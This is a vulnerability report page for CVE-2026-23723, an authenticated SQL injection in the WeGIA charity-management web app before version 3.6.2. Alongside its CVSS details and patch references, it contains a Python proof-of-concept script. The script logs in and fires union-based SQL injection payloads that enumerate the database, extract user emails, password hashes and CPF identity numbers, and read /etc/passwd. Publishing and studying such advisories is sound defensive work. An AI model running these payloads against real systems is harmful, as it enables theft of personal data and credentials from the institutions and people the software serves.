Security Vulnerability Report
CVE-2026-23723 CVSS 7.2 HIGH

CVE-2026-23723

Published: 2026-01-16 20:15:50
Last Modified: 2026-01-30 18:28:52

Description

WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an authenticated SQL Injection vulnerability was identified in the Atendido_ocorrenciaControle endpoint via the id_memorando parameter. This flaw allows for full database exfiltration, exposure of sensitive PII, and potential arbitrary file reads in misconfigured environments. This vulnerability is fixed in 3.6.2.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:* - VULNERABLE
WeGIA < 3.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import sys

# CVE-2026-23723 SQL Injection PoC
# Target: WeGIA < 3.6.2
# Endpoint: Atendido_ocorrenciaControle
# Parameter: id_memorando

target_url = "http://target-server/WeGIA/Atendido_ocorrenciaControle"

# Authentication (requires high privilege account)
login_url = "http://target-server/WeGIA/login.php"
credentials = {
    "username": "admin_user",
    "password": "password"
}

session = requests.Session()

# Login to obtain authenticated session
login_response = session.post(login_url, data=credentials)
if "authenticated" not in login_response.text:
    print("[-] Authentication failed")
    sys.exit(1)

print("[+] Successfully authenticated")

# SQL Injection payloads
payloads = [
    # Basic injection to confirm vulnerability
    "1' OR '1'='1",
    # Union-based injection for data extraction
    "1' UNION SELECT NULL,NULL,NULL,version(),user()-- -",
    # Database enumeration
    "1' UNION SELECT schema_name,NULL,NULL,NULL,NULL FROM information_schema.schemata-- -",
    # Table enumeration
    "1' UNION SELECT table_name,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema='wegia'-- -",
    # Column enumeration
    "1' UNION SELECT column_name,NULL,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='usuario'-- -",
    # Data exfiltration
    "1' UNION SELECT id_usuario,email,senha_hash,nome,cpf FROM usuario-- -",
    # File read (if privileged)
    "1' UNION SELECT NULL,NULL,LOAD_FILE('/etc/passwd'),NULL,NULL-- -"
]

for i, payload in enumerate(payloads):
    params = {"id_memorando": payload}
    try:
        response = session.get(target_url, params=params, timeout=10)
        print(f"\n[Payload {i+1}]: {payload}")
        print(f"Status: {response.status_code}")
        if "SQL" in response.text or "error" in response.text.lower():
            print("[!] Potential SQL error detected")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

Weakness

CWE-89 (Improper Neutralization of Special Elements used in an SQL Command)

References

https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 (Issue Tracking, Patch)
https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 (Release Notes)
https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp (Exploit, Vendor Advisory)